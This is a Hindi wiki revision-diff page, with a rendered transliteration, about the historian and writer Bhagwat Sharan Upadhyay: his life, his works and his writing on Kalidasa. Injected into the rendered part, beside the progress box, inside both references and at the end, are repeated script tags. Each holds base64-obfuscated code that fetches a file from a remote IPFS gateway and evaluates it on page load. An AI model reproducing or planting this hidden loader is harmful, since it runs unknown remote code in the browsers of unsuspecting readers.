Difference between revisions of "भगवतशरण उपाध्याय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''भगवतशरण उपाध्याय''' (अंग्रेज़ी: ''Bhagwat Sharan Upadhyay'' जन्म:1910,...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''भगवतशरण उपाध्याय''' ([[अंग्रेज़ी]]: ''Bhagwat Sharan Upadhyay'' जन्म:[[1910]]मृत्यु: [[12 अगस्त]] [[1982]]) भारतविद् के रूप में देशी-विदेशी अनेक महत्वपूर्ण संस्थाओं से सक्रिय रूप से संबद्ध रहे तथा अंतर्राष्ट्रीय स्तर पर भारतीय मनीषा का प्रतिनिधित्व किया। जीवन के अंतिम समय में वे [[मॉरीशस]] में [[भारत]] के राजदूत थे। भगवतशरण उपाध्याय का व्यक्तित्व एक पुरातत्वज्ञ, इतिहासवेत्ता, संस्कृति मर्मज्ञ, विचारक, निबंधकार, आलोचक और कथाकार के रूप में जाना-माना जाता है। वे बहुज्ञ और विशेषज्ञ दोनों एक साथ थे। उनकी आलोचना सामाजिक और ऐतिहासिक परिस्थितियों के समन्वय की विशिष्टता के कारण महत्वपूर्ण मानी जाती है। [[संस्कृति]] की सामासिकता को उन्होंने अपने ऐतिहासिक ज्ञान द्वारा विशिष्ट अर्थ दिए हैं।
+
{{सूचना बक्सा साहित्यकार
 +
|चित्र=Bhagwat-sharan-upadhyay.jpg
 +
|चित्र का नाम=भगवतशरण उपाध्याय
 +
|पूरा नाम=भगवतशरण उपाध्याय
 +
|अन्य नाम=
 +
|जन्म=[[1910]]
 +
|जन्म भूमि=[[बलिया]], [[उत्तर प्रदेश]]
 +
|मृत्यु=[[12 अगस्त]], [[1982]]
 +
|मृत्यु स्थान= [[मॉरीशस]]
 +
|अविभावक=
 +
|पालक माता-पिता=
 +
|पति/पत्नी=
 +
|संतान=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र= पुरातत्वज्ञ, इतिहासवेत्ता, संस्कृति मर्मज्ञ, विचारक, निबंधकार, आलोचक और कथाकार
 +
|मुख्य रचनाएँ='कालिदास का भारत', 'भारतीय इतिहास के आलोक स्तंभ', 'गुप्तकालीन संस्कृति', 'भारतीय कला और संस्कृति की भूमिका' आदि
 +
|विषय=[[इतिहास]] और [[संस्कृति]]
 +
|भाषा=[[हिंदी]]
 +
|विद्यालय=
 +
|शिक्षा=
 +
|पुरस्कार-उपाधि=
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=तीन खंडों में 'भारतीय व्यक्तिकोश' तैयार करने के अलावा उन्होंने [[नागरी प्रचारिणी सभा]], काशी द्वारा प्रकाशित 'हिन्दी विश्वकोश' के चार खंडों का संपादन भी किया।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''भगवतशरण उपाध्याय''' ([[अंग्रेज़ी]]: ''Bhagwat Sharan Upadhyay'' जन्म:[[1910]] - मृत्यु: [[12 अगस्त]], [[1982]]) भारतविद् के रूप में देशी-विदेशी अनेक महत्वपूर्ण संस्थाओं से सक्रिय रूप से संबद्ध रहे तथा अंतर्राष्ट्रीय स्तर पर भारतीय मनीषा का प्रतिनिधित्व किया। जीवन के अंतिम समय में वे [[मॉरीशस]] में [[भारत]] के राजदूत थे। भगवतशरण उपाध्याय का व्यक्तित्व एक पुरातत्वज्ञ, इतिहासवेत्ता, संस्कृति मर्मज्ञ, विचारक, निबंधकार, आलोचक और कथाकार के रूप में जाना-माना जाता है। वे बहुज्ञ और विशेषज्ञ दोनों एक साथ थे। उनकी आलोचना सामाजिक और ऐतिहासिक परिस्थितियों के समन्वय की विशिष्टता के कारण महत्वपूर्ण मानी जाती है। [[संस्कृति]] की सामासिकता को उन्होंने अपने ऐतिहासिक ज्ञान द्वारा विशिष्ट अर्थ दिए हैं।
 
==जीवन परिचय==
 
==जीवन परिचय==
भगवतशरण उपाध्याय का जन्म सन्‌ [[1910]] में [[बलिया]] ([[उत्तर प्रदेश]]) में तथा निधन सन्‌ [[1982]] में मॉरीशस में हुआ। तीन खंडों में 'भारतीय व्यक्तिकोश' तैयार करने के अलावा उन्होंने [[नागरी प्रचारिणी सभा]], काशी द्वारा प्रकाशित 'हिन्दी विश्वकोश' के चार खंडों का संपादन भी किया। भगवतशरण उपाध्याय का साहित्य-लेखन [[आलोचना (साहित्य)|आलोचना]] से लेकर [[कहानी]], रिपोर्ताज़, [[नाटक]], [[निबंध]], यात्रावृत्त, बाल-किशोर और प्रौढ़ साहित्य तक विस्तृत है।<ref>{{cite web |url=http://www.hindibhawan.com/linkpages_hindibhawan/gaurav/links_HKG/HKG79.htm |title=भगवतशरण उपाध्याय  |accessmonthday= 15 मार्च|accessyear=2014 |last= |first= |authorlink= |format= |publisher=हिंदी भवन |language=हिंदी}}</ref>
+
भगवतशरण उपाध्याय का जन्म सन्‌ [[1910]] में [[बलिया]] ([[उत्तर प्रदेश]]) में तथा निधन सन्‌ [[1982]] में [[मॉरीशस]] में हुआ। तीन खंडों में 'भारतीय व्यक्तिकोश' तैयार करने के अलावा उन्होंने [[नागरी प्रचारिणी सभा]], काशी द्वारा प्रकाशित 'हिन्दी विश्वकोश' के चार खंडों का संपादन भी किया। भगवतशरण उपाध्याय का साहित्य-लेखन [[आलोचना (साहित्य)|आलोचना]] से लेकर [[कहानी]], रिपोर्ताज़, [[नाटक]], [[निबंध]], यात्रावृत्त, बाल-किशोर और प्रौढ़ साहित्य तक विस्तृत है।<ref>{{cite web |url=http://www.hindibhawan.com/linkpages_hindibhawan/gaurav/links_HKG/HKG79.htm |title=भगवतशरण उपाध्याय  |accessmonthday= 15 मार्च|accessyear=2014 |last= |first= |authorlink= |format= |publisher=हिंदी भवन |language=हिंदी}}</ref>
 
==प्रमुख कृतियाँ==
 
==प्रमुख कृतियाँ==
 
; हिंदी रचनाएँ
 
; हिंदी रचनाएँ
Line 23: Line 56:
 
* फ़ीडर्स ऑफ़ इंडियन कल्चर।
 
* फ़ीडर्स ऑफ़ इंडियन कल्चर।
 
==बहुआयामी व्यक्तित्व==
 
==बहुआयामी व्यक्तित्व==
डॉ. भगवतशरण उपाध्याय का व्यक्तित्व बहुआयामी है। यद्यपि उनके व्यक्तित्व और कर्तव्य का मुख्य क्षेत्र इतिहास है, उनके लेखन का मुख्य विषय इतिहास है, उनके सोचने का मुख्य नजरिया ऐतिहासिक है, फिर भी संस्कृति के बारे में उनके दृष्टिकोण और चिन्तन को देखा जाए, वैसे ही साहित्य के बारे में उनके दृष्टिकोण और चिन्तन को देखना भी कम रोचक नहीं है। हिन्दी आलोचना के विकास में अथवा आलोचना-कर्म में उपाध्याय जी की चर्चा आमतौर से नहीं सुनी जाती। हिन्दी-आलोचना पर लिखी पुस्तकों में उनका उल्लेख नहीं मिलता और हिन्दी के आलोचकों की चर्चा के प्रसंग में लेखकगण उनका जिक्र नहीं करते। लेकिन डॉ. भगवतशरण उपाध्याय ने साहित्य के प्रश्नों पर, खासकर अपने समय के खास प्रश्नों पर तो विचार किया ही है, उन्होंने बाजाब्ता साहित्य की कृतियों की व्यावहारिक समीक्षा भी की है। यह तो अलग से ध्यान देने योग्य और उल्लेखनीय है कि उन्होंने [[कालिदास]] पर जितने विस्तार से लिखा है, उतने विस्तार से और किसी ने नहीं लिखा। कालिदास उनके अत्यंत प्रिय रचनाकार हैं। उन पर डॉ. उपाध्याय ने कई तरह से विचार किया है।<ref>{{cite web |url=http://www.pakhi.in/april_11/bhagwatshran_upadhya.php |title= भगवत शरण उपाध्याय  |accessmonthday= 15 मार्च|accessyear=2014 |last= |first= |authorlink= |format= |publisher=पाखी |language=हिंदी}}</ref>
+
डॉ. भगवतशरण उपाध्याय का व्यक्तित्व बहुआयामी है। यद्यपि उनके व्यक्तित्व और कर्तव्य का मुख्य क्षेत्र इतिहास है, उनके लेखन का मुख्य विषय इतिहास है, उनके सोचने का मुख्य नजरिया ऐतिहासिक है, फिर भी संस्कृति के बारे में उनके दृष्टिकोण और चिन्तन को देखा जाए, वैसे ही साहित्य के बारे में उनके दृष्टिकोण और चिन्तन को देखना भी कम रोचक नहीं है। हिन्दी आलोचना के विकास में अथवा आलोचना-कर्म में उपाध्याय जी की चर्चा आमतौर से नहीं सुनी जाती। हिन्दी-आलोचना पर लिखी पुस्तकों में उनका उल्लेख नहीं मिलता और [[हिन्दी]] के आलोचकों की चर्चा के प्रसंग में लेखकगण उनका जिक्र नहीं करते। लेकिन डॉ. भगवतशरण उपाध्याय ने साहित्य के प्रश्नों पर, खासकर अपने समय के खास प्रश्नों पर तो विचार किया ही है, उन्होंने बाजाब्ता साहित्य की कृतियों की व्यावहारिक समीक्षा भी की है। यह तो अलग से ध्यान देने योग्य और उल्लेखनीय है कि उन्होंने [[कालिदास]] पर जितने विस्तार से लिखा है, उतने विस्तार से और किसी ने नहीं लिखा। कालिदास उनके अत्यंत प्रिय रचनाकार हैं। उन पर डॉ. उपाध्याय ने कई तरह से विचार किया है।<ref>{{cite web |url=http://www.pakhi.in/april_11/bhagwatshran_upadhya.php |title= भगवत शरण उपाध्याय  |accessmonthday= 15 मार्च|accessyear=2014 |last= |first= |authorlink= |format= |publisher=पाखी |language=हिंदी}}</ref>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 14:36, 15 March 2014

bhagavatasharan upadhyay
poora nam bhagavatasharan upadhyay
janm 1910
janm bhoomi baliya, uttar pradesh
mrityu 12 agast, 1982
mrityu sthan m aaurishas
karm-kshetr puratatvajn, itihasavetta, sanskriti marmajn, vicharak, nibandhakar, alochak aur kathakar
mukhy rachanaean 'kalidas ka bharat', 'bharatiy itihas ke alok stanbh', 'guptakalin sanskriti', 'bharatiy kala aur sanskriti ki bhoomika' adi
vishay itihas aur sanskriti
bhasha hiandi
nagarikata bharatiy
any janakari tin khandoan mean 'bharatiy vyaktikosh' taiyar karane ke alava unhoanne nagari pracharini sabha, kashi dvara prakashit 'hindi vishvakosh' ke char khandoan ka sanpadan bhi kiya.
inhean bhi dekhean kavi soochi, sahityakar soochi

bhagavatasharan upadhyay (aangrezi: Bhagwat Sharan Upadhyay janm:1910 - mrityu: 12 agast, 1982) bharatavidh ke roop mean deshi-videshi anek mahatvapoorn sansthaoan se sakriy roop se sanbaddh rahe tatha aantarrashtriy star par bharatiy manisha ka pratinidhitv kiya. jivan ke aantim samay mean ve m aaurishas mean bharat ke rajadoot the. bhagavatasharan upadhyay ka vyaktitv ek puratatvajn, itihasavetta, sanskriti marmajn, vicharak, nibandhakar, alochak aur kathakar ke roop mean jana-mana jata hai. ve bahujn aur visheshajn donoan ek sath the. unaki alochana samajik aur aitihasik paristhitiyoan ke samanvay ki vishishtata ke karan mahatvapoorn mani jati hai. sanskriti ki samasikata ko unhoanne apane aitihasik jnan dvara vishisht arth die haian.

jivan parichay

bhagavatasharan upadhyay ka janm sanh‌ 1910 mean baliya (uttar pradesh) mean tatha nidhan sanh‌ 1982 mean m aaurishas mean hua. tin khandoan mean 'bharatiy vyaktikosh' taiyar karane ke alava unhoanne nagari pracharini sabha, kashi dvara prakashit 'hindi vishvakosh' ke char khandoan ka sanpadan bhi kiya. bhagavatasharan upadhyay ka sahity-lekhan alochana se lekar kahani, riportaz, natak, nibandh, yatravritt, bal-kishor aur praudh sahity tak vistrit hai.[1]

pramukh kritiyaan

hiandi rachanaean
  • bharatiy sanskriti ke srot
  • kalidas ka bharat (do khandoan mean)
  • guptakalin sanskriti
  • bharatiy samaj ka aitihasik vishleshan
  • kalidas aur unaka yug
  • bharatiy kala aur sanskriti ki bhoomika
  • bharatiy itihas ke alok stanbh (do khandoan mean)
  • prachin yatri (tin khandoan mean)
  • saanskritik chiantan
  • itihas sakshi hai
  • khoon ke chhiante itihas ke pannoan par
  • samiksha ke sandarbh
  • sahity aur paranpara
aangrezi rachanaean
  • iandiya in kalidas
  • vimen in rrigved
  • d eanshent varld
  • fidars aauf iandiyan kalchar.

bahuayami vyaktitv

d aau. bhagavatasharan upadhyay ka vyaktitv bahuayami hai. yadyapi unake vyaktitv aur kartavy ka mukhy kshetr itihas hai, unake lekhan ka mukhy vishay itihas hai, unake sochane ka mukhy najariya aitihasik hai, phir bhi sanskriti ke bare mean unake drishtikon aur chintan ko dekha jae, vaise hi sahity ke bare mean unake drishtikon aur chintan ko dekhana bhi kam rochak nahian hai. hindi alochana ke vikas mean athava alochana-karm mean upadhyay ji ki charcha amataur se nahian suni jati. hindi-alochana par likhi pustakoan mean unaka ullekh nahian milata aur hindi ke alochakoan ki charcha ke prasang mean lekhakagan unaka jikr nahian karate. lekin d aau. bhagavatasharan upadhyay ne sahity ke prashnoan par, khasakar apane samay ke khas prashnoan par to vichar kiya hi hai, unhoanne bajabta sahity ki kritiyoan ki vyavaharik samiksha bhi ki hai. yah to alag se dhyan dene yogy aur ullekhaniy hai ki unhoanne kalidas par jitane vistar se likha hai, utane vistar se aur kisi ne nahian likha. kalidas unake atyant priy rachanakar haian. un par d aau. upadhyay ne kee tarah se vichar kiya hai.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. bhagavatasharan upadhyay (hiandi) hiandi bhavan. abhigaman tithi: 15 march, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. bhagavat sharan upadhyay (hiandi) pakhi. abhigaman tithi: 15 march, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>